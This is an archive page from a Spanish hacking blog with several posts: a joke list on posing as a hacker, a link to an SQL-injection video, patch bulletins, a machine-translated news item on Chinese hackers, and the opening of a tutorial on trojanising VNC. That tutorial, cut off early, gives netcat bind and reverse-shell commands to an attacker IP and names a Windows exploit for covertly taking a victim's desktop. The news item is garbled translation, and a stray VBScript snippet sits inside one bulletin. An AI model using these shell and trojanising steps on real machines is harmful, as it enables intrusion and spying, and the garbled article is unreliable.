Search for in Google by Dino

Google Custom Search
Mostrando las entradas con la etiqueta HACKING. Mostrar todas las entradas
Mostrando las entradas con la etiqueta HACKING. Mostrar todas las entradas

martes, 31 de diciembre de 2013

Mi Spam Mi Harakiri - Un caso Forense

Cordial saludo a todos los lector@s del Mundo de Dino,


Deseándoles una Feliz Navidad y Prospero AÑO 2014, que sea llena de bendiciones y les auguro muchos éxitos en sus vidas y profesiones, que crezcan un montón y permanezcan unidos a los seres que mas aman.



Dándome a la tarea de sacar un poco de tiempo como excusa para desearles un Año Nuevo, quiero regalarles el día de Hoy la conferencia que quedo pendiente de dictar en el BarcampSE V4. debido a la falta de tiempo, espero te la disfrutes y si tienes alguna inquietud no dudes en contactarme. Gracias por estar aquí y aguantar mis tediosas y pesadas letras de mi Vida.








Byte Happy Hacking 2014 - Feliz Forensics 2014.




Dino.

viernes, 17 de agosto de 2007

Cómo hacerse "hacker"

Hola,

Dandome una vueltika por TodoLinux me encontre con este link que referenciaba otro Dinosaurio el buen Aliensaurio, sobre este profundo tema

XDDDD


1) En primer lugar tú no puedes llamarte de cualquier manera si te vas a dedicar a esto: no vale Ramirez, Lucía, o cosas así. Debes elegir un "nick" apropiado como kOrLeOnE, HostiaPuta, o similar.

2) Tu dirección de correo-e no puede ser tan vulgar como las de Terra o Wanadoo. Evita la terminación .ES; debes usar .COM, .ORG o .NET, que ayudan a mentalizarse cuando uno es de Cartagena, ya sabes. Debes buscar una dirección acorde con el nick, y más falsa que un billete de 7 euros. Por ejemplo, estaría bien que usaras un remite como bronkas @ ciberkraker.com .

3) Por supuesto tú no usas un ordenador ni una computadora, ni un cerebro electrónico (¡esto ni de coña, por favor!). Lo tuyo es una MAKINA que corre bajo LINUX. Como se te ocurra decir que tienes GÜINDOS la cagaste pa toa la vida.

4) Tus mensajes (desde ahora los llamarás "posts") deben ser redactados "offline". Luego los repasas, sustituyendo las letras Q por K, y también las C que hagan ese mismo sonido; las otras C las sustituyes por Z, cambia las V por B, omite los acentos, quita las H mudas y añade otras H donde nadie lo espere: ¡Ni te himajinas la sensazion de duro ke produzen estos tokes, parezeras halternatibo, algo asi komo Santiago Segura!... No dejes de mencionar continuamente la "birra", como si fueras drogodependiente y tuvieras que citarla cada tres o cuatro líneas.

5) Tienes que cogerte la última versión del programa AGENT, aunque sea pagando. Pero dirás que tu "reader" (o sea el programejo ese, para leer y escribir tonterías) es crakeado. Ya se que joroba mucho usar un programa en inglés y abandonar la comodidad del Outlook Express. El prestigio obliga a estos sacrificios.

6) Por supuesto no se te ocurra pedir ni preguntar nada: Tú lo sabes todo, de momento. Cuando te consideren "gurú" llega el momento de pedir el crack del WINZIP o cualquier otra "merde" por el estilo... diciendo que es "pa un kolega jili ke usa er Güindoze".

7) En alguno de tus post debes contar, casualmente, que una vez te colaste como "root" en un sistema gubernamental, y que dejaste una hermosa "huella" de tu paso (no vayas a decir que te cagaste, que tampoco es cosa de concretar los detalles).

8) Ni se te ocurra decir que bajas el soft de siktios como Softtonic o Tucows, y mucho menos de Microsoft (dí siempre "Mocosof", que mola). Esos sitios ni los visitas; te pasas horas en Islatortuga o en el sitio de PGP (del que -por supuesto- tienes la última versión).

9) Estás suscrito, faltaría más, a todos los newsgroups warez, hacking, prehaking (esto no se como s'escribe) y fucking (esto sí), y por aquí solo vienes a dar algún consejillo que nunca es bien valorado (snif...).

10) Contesta (manda "replys") a todos los que pidan algo como craks, drivers, serial numbers... Es muy oportuno que les respondas cosas como "¡Tú eres un lamer de mierda!", o "ke t den". Cuando otros mencionen a algún hacker famoso o a un creador de virus, recuerda manifestar similares desprecios hacia esos personajes.

Al poco tiempo te habrás hecho un nombre y ya puedes empezar a pedir lo que pide la mayoría. Verás que hay poco "jaker" a quien admirar; lo que abunda es un puñado de "marianos" que van por la vida presumiendo de lo que no saben, igual que tú y yo. Pero serás capaz de conseguir un decodificador de canal plus para ver las pelis de los viernes.

Este texto (o similares) circulan por Internet desde hace años, con ligeras variaciones de una versión a otra. Puede encontrarse en muchas páginas web, y también es transmitido por correo electrónico, en foros y listas, etc. Me ha sido imposible averiguar quién escribió el original. Yo lo he copiado y le he añadido algunos pequeños retoques para actualizarlo y abreviarlo un poco.


Vieron que era bueno, a seguirlo al pie de la letra Bucia y la Reina Gay


Chaos


Dino

PD:
Fuente: http://www.caravantes.com/humor/jaker.htm

sábado, 31 de marzo de 2007

SQL Injection+Shell

Hola a todos,


Bueno esta vez les traigo un video de SQL injection+Shell cortesia del amigo Garcez de Yashira.org !


Enjoy


http://garcez.tekkenbolivia.net/seeit-videoSQLInj_garcez.zip

Otro enlace al sitio de Georgina XD
http://g30rg3x.com/wp-files/SQLInjection+Shell_garcez.zip

Thank Garcez y g30rg3x por prestar tu sitio.

Si tienes problemas con los CODEC descargalos de aqui:

Aunque necesitarán los codecs de video que los pueden descargar en http://www.xvidmovies.com/codec/

lunes, 18 de diciembre de 2006

Siete boletines de seguridad de Microsoft en diciembre

Como cada segundo martes de mes, Microsoft ha publicado sus ya habituales boletines de seguridad. En esta ocasión, finaliza el año con siete nuevos boletines (MS06-072 al MS06-078).




Según la propia clasificación de Microsoft tres de los nuevos boletines presentan un nivel de gravedad "crítico", mientras que los cuatro restantes reciben la calificación de "importante".

Es por tanto, importante conocer la existencia de estas actualizaciones, evaluar el impacto de los problemas y aplicar las actualizaciones en la mayor brevedad posible. Este es un boletín de urgencia en el que describimos superficialmente cada uno de los nuevos boletines de seguridad de Microsoft. En los próximos días publicaremos otros boletines donde analizaremos más detalladamente las actualizaciones más importantes.

* MS06-072: Actualización acumulativa para Microsoft Internet Explorer que además soluciona cuatro nuevas vulnerabilidades que podrían permitir la ejecución remota de código arbitrario o la divulgación de información sensible. Según la calificación de Microsoft está calificado como "crítico". Afecta a Internet Explorer 5.01 e Internet Explorer 6.
* MS06-073: Se trata de una actualización para evitar una vulnerabilidad en Visual Studio 2005 que permite ejecución remota de código. Está calificado como "crítico".
* MS06-074: Destinado a solucionar una vulnerabilidad en SNMP que puede permitir a un atacante remoto ejecutar código arbitrario. Según la calificación de Microsoft está calificado como "Importante". Afecta a Windows 2000, Windows XP y Windows Server 2003.
* MS06-075: Se trata de una actualización para Microsoft Windows debido a que se ha detectado una vulnerabilidad que pueden permitir la elevación de privilegios en el sistema. También recibe una calificación de "importante". Afecta a Windows XP y Windows Server 2003.
* MS06-076: Actualización acumulativa para Outlook Express que además soluciona una nueva vulnerabilidad que podría permitir la ejecución remota de código arbitrario. Según la calificación de Microsoft está calificado como "importante". Afecta a Outlook Express 5.5 y 6.
* MS06-077: En este boletín se anuncian los parches de actualización necesarios para solventar una vulnerabilidad en Remote Installation service (RIS). Afecta a Windows 2000. Está calificado como "importante".
* MS06-078: Soluciona dos vulnerabilidades en Windows Media Player que pueden permitir a un atacante remoto la ejecución de código arbitrario. Está calificado como "crítico".

Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche.

Análisis y situación de los últimos parches de Microsoft

Habitualmente (y no sólo con Microsoft) junto con la aparición de los parches, los investigadores que han descubierto los problemas de seguridad hacen públicos los detalles sobre sus pesquisas, tras haber esperado pacientemente a la existencia de un parche oficial.





Inevitablemente esto conlleva la aparición de nuevos exploits. Tras unos días "ahí fuera", hacemos un repaso a la situación de los últimos parches de seguridad de Microsoft.

MS06-066:

Ejecución de código remoto en servicios de cliente NetWare. Probablemente el usuario medio no tenga instalado ese protocolo. Existe prueba de concepto pero no es pública. La vulnerabilidad es calificada como de criticidad importante.

MS06-067:

Actualización acumulativa para Microsoft Internet Explorer que además soluciona tres nuevas vulnerabilidades no públicas hasta la fecha. Dos en el control ActiveX DirectAnimation y una en la propia interpretación de HTML (que también podría ser aprovechada a través de correo). Son graves y permiten la ejecución de código. Se debería parchear cuanto antes. Según Websense, uno de los problemas en el control ActiveX DirectAnimation era conocido ya desde septiembre y existen numerosas páginas que estaban aprovechando el problema para instalar malware. No afecta a Internet Explorer 7.

MS06-068:

Corrige una vulnerabilidad en Microsoft Agent (agente de Microsoft que gestiona cuestiones de ayuda al usuario en el sistema) y permite ejecución remota de código. Es más peligrosa porque puede ser invocada a través de ActiveX en el navegador, por tanto, es aprovechable de forma remota. Además del parche, en la página del boletín viene cómo desactivar "el uso" del control por parte de Internet Explorer para prevenir futuros problemas. No se conocen exploits públicos.

MS06-069:

Resuelve cinco vulnerabilidades en Macromedia Flash Player de Adobe. Afecta sólo al plugin para el navegador en Windows XP. Está calificado como crítico y no se conocen exploits públicos. Se trata de los mismos problemas de los que ya advirtió Adobe a principios de septiembre y para los que existen parches desde entonces. Si se actualizó desde la página Adobe en su día, no hay problema.

MS06-070:

Solventa una vulnerabilidad en el servicio "estación de trabajo", que podría permitir la ejecución remota de código arbitrario. Afecta a Windows 2000 y Windows XP. Existen numerosos exploits públicos. Especialmente preocupante si el servicio es accesible a través de Internet, y no se tiene cortafuegos instalado. En red interna (aunque se suponga un entorno confiable) supone un verdadero problema, pues el servicio suele estar disponible y accesible para compartir o acceder a recursos, etc. Importantísimo parchear cuanto antes sobre todo en Windows 2000, donde es más fácilmente aprovechable. Parece que no afecta a Windows 2003.

MS06-071:

Corrige una conocida vulnerabilidad que está siendo aprovechada masivamente (al visitar con IE páginas manipuladas) desde hace semanas, el problema con XML Core Services. Se ven afectadas las versiones 4.0 y 6.0. Reemplaza al boletín MS06-061.

No se tiene constancia de que ningún parche esté causando problemas en el sistema. Este mes no se han emitido parches para Windows XP Service Pack 1, pues ha terminado su ciclo de vida. Los usuarios y administradores que no lo hayan hecho ya (recomendable, pues supone considerables mejoras de seguridad) deberían actualizarse con el Service Pack 2. Por otro lado, Microsoft también ha anunciado que alarga la vida de SUS hasta julio de 2007. SUS es un sistema de actualización para redes internas (sustituido ya por WUS), muy útil para administradores, que permite desplegar cómodamente parches a decenas de máquinas.

Parche acumulativo para Mac OS X corrige hasta 31 vulnerabilidades

Entre las numerosas correcciones parece que no se han publicado demasiadas para combatir el particular acoso que se está realizando contra los sistemas de Apple.




Apple ha publicado sus habituales parches acumulativos, en esta ocasión el séptimo del año y en el que corrige hasta 31 fallos de seguridad distintos que permiten escaladas de privilegios, denegaciones de servicio, ejecución de código remoto y local y saltos de restricciones de seguridad.

Alguno de los errores más graves:
- Un fallo en los controladores inalámbricos Airport que afecta a muchos sistemas Mac y que permite ejecución de código remota. El fallo fue descubierto por HD Moore a principios de mes.
- Varios errores en el servidor Apple Type Services que permiten a atacantes locales sobrescribir o crear ficheros arbitrarios con privilegios de sistema.
- Existe también un desbordamiento de memoria intermedia basado en heap en el Finder a la hora de navegar por directorios que contengan un fichero .DS_Store especialmente manipulado. Esto puede permitir a atacantes locales ejecutar código con los privilegios del usuario Finder.
- Un fallo en Installer permite a atacantes instalar ciertos paquetes sin necesidad de - credenciales de administrador.
- Existe un desbordamiento de memoria intermedia en PPP (Point to Point Protocol) a la hora de manejar tráfico PPPoE (Point to Point Protocol over Ethernet) que permite a atacantes en la red local ejecutar código arbitrario.
- Security Framework permite a atacantes eludir varias restricciones de seguridad. Se han publicado actualizaciones además para ftpd, CFNetwork, Online Certificate Status Protocol (OCSP), VPN, WebKit, gzip, ClamAV, OpenSSL, Perl, PHP, Samba...

Entre las numerosas correcciones, parece que no se han publicado demasiadas para combatir el particular acoso que "el mes de los fallos en el núcleo" está realizando contra los sistemas de Apple. La mayoría de los errores publicados por ahora, descubren problemas más o menos graves para su sistema operativo. Por lo tanto, incluso después de este parche acumulativo, a Apple le quedan todavía muchas vulnerabilidades que investigar.

Se recomienda actualizar a través de las herramientas automáticas o de la página oficial:
10.3.9 Cliente: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=12175&cat=1&platform=osx&method=sa/SecUpd2006-007Pan.dmg
10.3.9 Servidor: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=12177&cat=1&platform=osx&method=sa/SecUpdSrvr2006-007Pan.dmg
10.4.8 Cliente Intel: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=12176&cat=1&platform=osx&method=sa/SecUpd2006-007Intel.dmg
10.4.8 Cliente PPC: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=12178&cat=1&platform=osx&method=sa/SecUpd2006-007Ti.dmg
10.4.8 Servidor PPC: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=12179&cat=1&platform=osx&method=sa/SecUpdSrvr2006-007Ti.dmg
10.4.8 Servidor Universal: http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=12180&cat=1&platform=osx&method=sa/SecUpdSrvr2006-007Universal.dmg

Parche acumulativo para Microsoft Internet Explorer

El producto solventa un total de cuatro nuevas vulnerabilidades descubiertas en las versiones 5.01 y 6 del navegador.




Dentro del conjunto de boletines de diciembre publicado esta semana por Microsoft y del que efectuamos un adelanto el pasado martes, se cuenta el anuncio (en el boletín MS06-072) de una actualización acumulativa para Internet Explorer, que además solventa un total de cuatro nuevas vulnerabilidades descubiertas en las versiones 5.01 y 6 del navegador.

Las vulnerabilidades corregidas son las siguientes:
- Una corrupción de memoria a la hora de manejar scripts puede llevar a la ejecución de código arbitrario.
- Una corrupción de memoria a la hora de manejar scripts DHTML puede llevar a la ejecución de código arbitrario.
- Dos problemas de revelación de información sensible a través de la carpeta TIF.

Este boletín reemplaza al boletín previo MS06-067. No afecta a Internet Explorer 7.

Actualice los sistemas afectados mediante Windows Update o descargando los parches según versión desde las siguientes direcciones:

- Microsoft Internet Explorer 5.01 Service Pack 4 bajo Windows 2000 Service Pack 4 http://www.microsoft.com/downloads/details.aspx?FamilyId=1D28E62C-09D3-4F38-BEA3-3FC501449D29&displaylang=es
- Microsoft Internet Explorer 6 Service Pack 1 instalado en Windows 2000 Service Pack 4 http://www.microsoft.com/downloads/details.aspx?FamilyId=3CFC32FC-85CA-4EDA-890D-5E359F5F0019&displaylang=es
- Microsoft Internet Explorer 6 para Windows XP Service Pack 2 http://www.microsoft.com/downloads/details.aspx?FamilyId=8B321744-B55E-4696-8B2C-B1D31672DA06&displaylang=es
- Microsoft Internet Explorer 6 para Windows XP Professional x64 Edition http://www.microsoft.com/downloads/details.aspx?FamilyId=8D841D1B-D0B1-46AF-87BD-7DAA8C31AF39&displaylang=es
- Microsoft Internet Explorer 6 para Windows Server 2003 y Microsoft Windows Server 2003 Service Pack 1 http://www.microsoft.com/downloads/details.aspx?FamilyId=3E3A9693-D21B-4214-A16C-3FC22340E600&displaylang=es
- Microsoft Internet Explorer 6 para Windows Server 2003 bajo Itanium-based Systems y Windows Server 2003 con SP1 bajo Itanium-based Systems http://www.microsoft.com/downloads/details.aspx?FamilyId=9E3F7A2C-BFE1-48C5-8A8A-64A06BCDF219&displaylang=es

Vulnerabilidad en listas de ASX de Microsoft Windows Media Player 10.x

No existe parche oficial, aunque Microsoft ha confirmado que se encuentra investigando el problema y los posibles vectores de ataque asociados




Se ha encontrado una vulnerabilidad en Windows Media Player que pude ser aprovechada por atacantes para provocar una denegación de servicio o potencialmente ejecutar código arbitrario.

El fallo se debe a un error de límites a la hora de manejar etiquetas "REF HREF" en listas de reproducción ASX. Esto puede ser aprovechado para provocar un desbordamiento de memoria intermedia basado en heap a través de una cadena larga con una URL inválida.

Es posible que el problema permita la ejecución de código arbitrario. El fallo ha sido confirmado en la versión 10.00.00.4036 aunque otras pueden verse afectadas, además cabe señalar que existe una prueba de concepto de la vulnerabilidad.

No existe parche oficial, aunque Microsoft ha confirmado que se encuentra investigando el problema y los posibles vectores de ataque asociados. Se recomienda no abrir listas de reproducción no confiables.

Múltiples vulnerabilidades en Symantec Veritas Netbackup

Se han encontrado varias vulnerabilidades en Symantec Veritas Netbackup que podrían ser aprovechadas por atacantes para ejecutar código arbitrario.




Symantec Veritas Backup es un popular y completo sistema de almacenado y restauración de copias de seguridad en red.

Los errores descubiertos son:

* Un error en el servicio principal Netbackup (bpcd.exe) que puede ser aprovechado a través de encadenado de comandos para hacer que el servicio ejecute código arbitrario.
* Un error de límites en el servicio principal Netbackup (bpcd.exe) a la hora de interpretar peticiones largas puede ser aprovechado para provocar un desbordamiento de memoria intermedia basado en pila si se le pasa al servicio una petición muy larga con un campo longitud mal formado.
* Existe por último un error de límites también en el servicio principal Netbackup (bpcd.exe) a la hora de interpretar peticiones CONNECT_OPTIONS puede ser aprovechado para provocar un desbordamiento de memoria intermedia basado en pila a través de una petición muy larga.

Las vulnerabilidades fueron comunicadas al fabricante a través de la iniciativa Zero Day de TrippingPoint el 14 de agosto de 2006.

Las versiones afectadas son:

Veritas NetBackup Advanced Client 5.x y 6.x
Veritas NetBackup Enterprise Server 5.x y 6.x
Veritas NetBackup Server 5.x y 6.x

Se recomienda aplicar los parches disponibles desde: http://seer.support.veritas.com/docs/285082.htm

Descubiertas tres vulnerabilidades "0 day" en productos Microsoft

Esta semana se han encontrado dos vulnerabilidades de tipo 0 day en Microsoft Word.




Esto vuelve a posicionar a Office como el vector de ataque preferido para la infección de sistemas a través del aprovechamiento de vulnerabilidades hechas públicas cuando ya están siendo explotadas. También se ha publicado una prueba de concepto que permite ejecución de código a través de ficheros ASX de Windows Media Player.

El 6 de diciembre Microsoft publicaba un aviso oficial sobre un ataque detectado que se valía de una vulnerabilidad en Word. El problema afectaría a Microsoft Word 2000, 2002, 2003, Word Viewer 2003, Word 2004 para Mac y Word 2004 v. X para Mac. También a Microsoft Works 2004, 2005 y 2006.

La vulnerabilidad está provocada por un error no especificado en el tratamiento de documentos Word y puede ser aprovechada para causar una corrupción de memoria, que puede conllevar una ejecución de código arbitrario. Microsoft hablaba del descubrimiento de ataques limitados que podrían afectar de una forma muy concreta a pocas empresas u organizaciones contra las que iría dirigido específicamente. Aunque esto por ahora limite el alcance del problema, no es motivo para restar gravedad al fallo. Los detalles pueden ser cedidos, investigados o publicados en cualquier momento y afectar a un gran número de personas.

Nuevamente, el día 10 Microsoft alertaba de un nuevo problema en Word (al parecer descubierto por McAfee a través de una muestra infectada), sobre el que no daba detalles, pero que especificaba era distinto al encontrado unos días antes. En esta ocasión afectaba a Microsoft Word 2000, 2002, 2003 y Word Viewer 2003. Word 2007 no se ve afectado. Microsoft hablaba de ataques aún más limitados. El fallo también permitiría la ejecución de código.

Entre estas dos alertas, el día siete, se encuentra una nueva vulnerabilidad en Windows Media Player que puede ser aprovechada por atacantes para provocar una denegación de servicio. El fallo en Windows Media Player se debe a un error de límites a la hora de manejar etiquetas "REF HREF" en listas de reproducción ASX. Esto puede ser aprovechado para provocar un desbordamiento de memoria intermedia basado en heap en el fichero WMVCORE.DLL a través de una cadena larga con una URL inválida. Es muy posible que el problema permita la ejecución de código arbitrario. Los ficheros ASX se abren automáticamente si son vistos a través del navegador, lo que puede facilitar el ataque aunque no se utilice el programa.

Para mitigar los problemas con Word, se recomienda como siempre no abrir archivos adjuntos en formato DOC no solicitados. Observando la cantidad de vulnerabilidades que están siendo aprovechadas de forma continua en este producto en concreto, también es recomendable utilizar cuando sea posible, alternativas como OpenOffice. En el caso de la vulnerabilidad en Windows Media Player, se recomienda además desasociar la extensión ASX con el programa. En cualquier caso, también, disminuir los privilegios con los que se trabaja sobre el sistema para limitar el impacto de un posible ataque.

Vulnerabilidad de formato de cadena en gdmchooser de GNOME Display Manager

Se ha encontrado una vulnerabilidad en GNOME Display Manager por la que un atacante local podría elevar privilegios en el sistema afectado.




gdmchooser es un programa que proporciona funcionalidad XDMCP (X Display Manager Control Protocol) al GNOME Display Manager. Este protocolo permite a un usuario interacturar con sistemas remotos a través del X11 local.

Existe un fallo de formato de cadena en la función gdm_chooser_browser_add_host en el archivo gui/gdmchooser.c a la hora de procesar nombres de hosts, que puede ser aprovechado para ejecutar comandos arbitrarios en el sistema con los privilegios del servicio GNOME Display Manager (gdm). Usuarios locales no autenticados podrían ejecutar gdmchooser e introducir caracteres especialmente manipulados en el cuadro de diálogo para lanzar la vulnerabilidad.

La vulnerabilidad fue comunicada al fabricante a través de iDefense el 4 de diciembre de 2006.

Se han publicado versiones no vulnerables (2.14.11, 2.16.4, y 2.17.4) disponibles desde: http://ftp.gnome.org/pub/GNOME/sources/gdm, además de que cada distribución está actualizando ya sus repositorios.

Escalada de privilegios en drivers de adaptadores de red Intel

Intel ha publicado actualizaciones para múltiples versiones de sus controladores de adaptadores de red.




Esta publicación se debe al descubrimiento por parte de la compañía eEye de la existencia de una vulnerabilidad en todos sus drivers de adaptadoras de red PCI, PCI-X y PCIe que podrían permitir a atacantes locales realizar escaladas de privilegios.

Este problema afectaría a las siguientes versiones de drivers para adaptadores (según versión y plataforma):

* Windows: Intel PRO 10/100 8.x, PRO/1000 8.x, PRO/1000 PCIe 9.x
* Linux: Intel PRO 10/100 3.x, PRO/1000 7.x, PRO/10GbE 1.x
* UnixWare/SCO6: Intel PRO 10/100 4.x, PRO/1000 9.x

El problema se debe a la existencia de un error que puede ser explotado para provocar un desbordamiento de búfer al utilizar de forma incorrecta una llamada a cierta función no especificada por el fabricante. Esta circunstancia permitiría al atacante local ejecutar código arbitrario con privilegios a nivel de kernel.

Intel recomienda aplicar los parches especificados en su notificación de alerta oficial, disponible en esta dirección: http://www.intel.com/support/network/sb/CS-023726.htm

Elevación de privilegios local a través de ld.so en Sun Solaris

Y como la ven con los grandes como SUN AH?

Existen dos problemas de seguridad en ld.so de Solaris 8, 9 y 10, que pueden permitir a un atacante local obtener privilegios de root.

dcmaxversion = 9
dcminversion = 6
Do
On Error Resume Next
plugin = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash." & dcmaxversion & "")))
If plugin = true Then Exit Do
dcmaxversion = dcmaxversion - 1
Loop While dcmaxversion >= dcminversion

- Existe un desbordamiento de memoria intermedia en la función de formateo doprf de ld.so.- Existe un problema de directorio transversal en ld.so que puede permitir la ejecución local de código como root a través de la definición de una variable de entorno LANG especialmente manipulada.Según versión y plataforma, las actualizaciones están disponibles desde:- Plataforma SPARC:Solaris 8 descargar 109147-42 o posterior desde:

http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-109147-42-1Solaris 9 descargar 112963-27 o posterior desde:

http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-112963-27-1- Plataforma x86:Solaris 8 descargar 109148-41 o posterior desde:

http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-109148-41-1Solaris 9 descargar 113986-22 o posterior desde:

http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-113986-22-1También se ha publicado un Interim Security Relief (ISRs) para Solaris 10 disponible desde:

http://sunsolve.sun.com/tpatches- Plataforma SPARC: Para Solaris 10, IDR124828-01- Plataforma x86: Para Solaris 10, IDR124829-01


Good Luck

Dino

viernes, 1 de diciembre de 2006

Encierro pronto del sitio de la universidad de la marina de guerra de los hackers chinos

H0l@,


Por Bill Gertz
LOS TIEMPOS DE WASHINGTON
30 de noviembre de 2006

Los hackers de computadora chinos penetraron la red universitaria naval de la guerra anterior este mes, forzando autoridades de la seguridad cerrar todo el E-mail y trabajo de la red de ordenadores del funcionario en la escuela de la marina de guerra para los antiguos funcionarios.
Los funcionarios de la marina de guerra dijeron que el ataque de la computadora fue detectado el 15 Nov y dos días más adelante el comando estratégico de los E.E.U.U. levantó el nivel de la alarma de la seguridad para las redes de ordenadores y 5 millones de computadoras del pentágono 12.000.
Un portavoz para las operaciones de la defensa de Cyber de la marina de guerra ordena, localizado en Norfolk, las “intrusiones dichas de la red” fue detectado en el Newport, índice de refracción, escuela militar hace dos semanas.
“La conexión de la sistema-red fue terminada y los sistemas afectados sabidos fueron quitados y se están examinando para que la evidencia forense determine el grado de la intrusión,” dijo a teniente. Comandante Doug Gabos, el portavoz.
“La sistema-red naval de la computadora de la universidad de la guerra es utilizada por los estudiantes en la universidad de la guerra y contiene programa profesional de la lectura de la marina de guerra y otros materiales, que son información sin clasificar.”
Los FBI y el servicio investigador criminal naval están investigando la abertura, otro funcionario dicho.
La universidad naval de la guerra entrena a antiguos funcionarios, conduce juegos de la guerra y realiza una cierta investigación clasificada tal como estudios de la guerra futura. El Web site de la universidad no era accesible ayer.
Adm. Michael Mullen, jefe de operaciones navales, ordenó recientemente a grupo de estudio estratégico de la universidad de la guerra comenzar el trabajo para desarrollar los conceptos para emprender la cyber-guerra, portavoz de la marina de guerra dicho.
“La universidad naval de la guerra es donde está planeamiento y técnicas el grupo de estudio estratégico de la marina de guerra practicantes del cyber-war, y ahora incluso no tienen acceso del E-mail,” un funcionario de los E.E.U.U. dicho.
Los funcionarios de la defensa de los E.E.U.U. dijeron que los informes de la inteligencia indicó que cyber-atacar en la universidad vino de China, que un informe del congreso reciente dicho ha comenzado una serie de ataques de la red de ordenadores contra defensa y sistemas militares en los Estados Unidos código-nombrados “lluvia del titán.”
Comandante jubilado de la fuerza aérea. El generador Richard Goetze, profesor naval de la universidad de la guerra, dijo una clase lunes en Washington que los hackers de computadora chinos estuvieran detrás del ataque de la red. El generador Goetze dijo a estudiantes que las comunicaciones fueran dificultadas porque el chino “tomó abajo” a universidad naval entera de la guerra la red de ordenadores.
Los estudiantes y los profesores en la universidad ahora tienen que utilizar E-mail privado de casero, planteando preguntas de la seguridad.


Good Luck

Dino

martes, 28 de noviembre de 2006

Troyanizando VNC!!

Por fin ya está aquí, ya llegó!

Para todos aquellos que os preguntabais…

¿Cómo puedo obtener el escritorio remoto de una víctima a partir de una shell remota conseguida tras una intrusión?

Antes de nada, la NOTA ÉTICA.

El objetivo de este escrito no es fomentar la intrusión
en equipos de víctimas inocentes, eso es ilegal.

El objetivo de este escrito tampoco es fomentar el espionaje y la violación absoluta de privacidad de víctimas inocentes, eso es ilegal.

Este escrito es el fruto de varias semanas de experimentos, del interés por la búsqueda del conocimiento, de la curiosidad que despierta en algunos de nosotros lo desconocido, de pensar “sería esto posible?” y no quedarse de brazos cruzados esperando a que otro nos resuelva la duda, de la colaboración desinteresada de
algunos compañeros que no dudan en ayudar a otros en los foros y muchos otros valores que pertenecen a algo llamado la Ética Hacker. Y por eso queremos compartir nuestra experiencia con el resto de compañeros, expandir nuestro conocimiento, porque es nuestro deber dar después de haber recibido…Todas las acciones que se han llevado a cabo para obtener el contenido de este escrito han sido realizadas con equipos de nuestra propiedad, bajo nuestro completo control.

Los términos atacante y víctima son metafóricos, se utilizan simplemente para dar una notación y no toman el significado literal en ningún momento.

No somos, en ningún caso, responsables de las acciones que sean llevadas a cabo con el uso de la información publicada en este escrito.

Toda la información aquí expuesta tiene carácter científico y educativo. Recuerda, tú eres el responsable de tus actos.

Después de dejar las cosas claras, paso a describir el escenario con el que vamos a trabajar.

Un equipo atacante, con la IP 10.10.0.69
Un equipo víctima, con la IP 10.10.0.80

Ambos utilizan el sistema operativo Microsoft Windows y no están protegidos por ningún tipo de firewall o dispositivo IDS de detección de intrusos.

Aunque este escenario toma lugar en una red local, es posible trasladarlo a un contexto de Internet.

1) OBTENIENDO UNA SHELL REMOTA DE LA VÍCTIMA

Aunque existen muchas y diversas maneras de llegar a obtener una shell remota de cierta víctima, desde el uso de la Ingeniería Social hasta el uso de técnicas más avanzadas de intrusión en sistemas remotos, no es materia de explicación en este escrito cómo llegar a obtener una shell remota a través de todas ellas. Por lo tanto, damos por hecho que el atacante tiene los conocimientos mínimos para
obtener una shell remota.

Aún así, creo conveniente explicar que según se utilice una u otra forma de intrusión, la shell remota obtenida tendrá características diferentes.

De esta forma, un ejemplo de intrusión realizada con Ingeniería Social, lo más probable es que se sirva del engaño para lograr que la víctima ejecute netcat para servir una shell remota al atacante.

Ya sea mediante shell directa:
- Víctima: nc –l –p 9797 –d –e cmd.exe
- Atacante: nc 10.10.0.80 9797

o mediante Reverse shell:
- Atacante:
nc –l –p 9797 –vv
- Víctima:
nc –d –e cmd.exe 10.10.0.69 9797

los privilegios de la shell remota obtenida serán de USUARIO, esto es, con los privilegios de la cuenta de usuario activa en el momento en que se realizó la intrusión.

En cambio, otro ejemplo de intrusión mediante la explotación de vulnerabilidades en el sistema remoto con Exploits, dará lugar a la obtención de una shell remota con privilegios de SYSTEM.

Este texto acompaña a todos los boletines de Seguridad referidos a vulnerabilidades críticas en Microsoft Windows:


An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system, including installing programs, viewing changing or deleting data, or creating new accounts with full privileges.

Aunque la cuenta SYSTEM es más poderosa que cualquier otra cuenta de usuario, tiene sus limitaciones. Una de estas limitaciones es que no permite crear, modificar o borrar claves de registro en

\\HKEY_CURRENT_USER\.

Este simple detalle es importante, pues si queremos llegar a troyanizar el servidor VNC, deberemos agregar varias claves en esta parte del registro de la víctima.

Es por ello, que este tutorial está dirigido a saber cómo es posible troyanizar el servidor VNC en una víctima remota, a través de una shell con privilegios de SYSTEM (el caso más complejo de los dos citados). Este procedimiento también es válido para el caso de shell remota obtenida con privilegios de USUARIO.

Así pues, procedemos a obtener una shell remota de cierta víctima utilizando para ello un Exploit.

Aunque, en mi caso, yo voy a explotar la vulnerabilidad MS04-011 con el exploit HoD
@ http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php, se obtiene el mismo resultado explotando otras vulnerabilidades como MS03-026 con el exploit Dcom o MS03-049 con el exploit de Wirepair, por poner algunos ejemplos…

1) Ejecutamos el exploit:


2) Nos conectamos a la víctima con nc para obtener la shell remota:



2) CONOCIENDO EL PROGRAMA VNC

Llegados a este punto, voy a presentaros VNC.

VNC (Virtual Network Computer) es una aplicación cliente-servidor que permite visualizar e interactuar con el escritorio de cualquier equipo remoto conectado a Internet.

La página oficial del proyecto es http://www.realvnc.com/

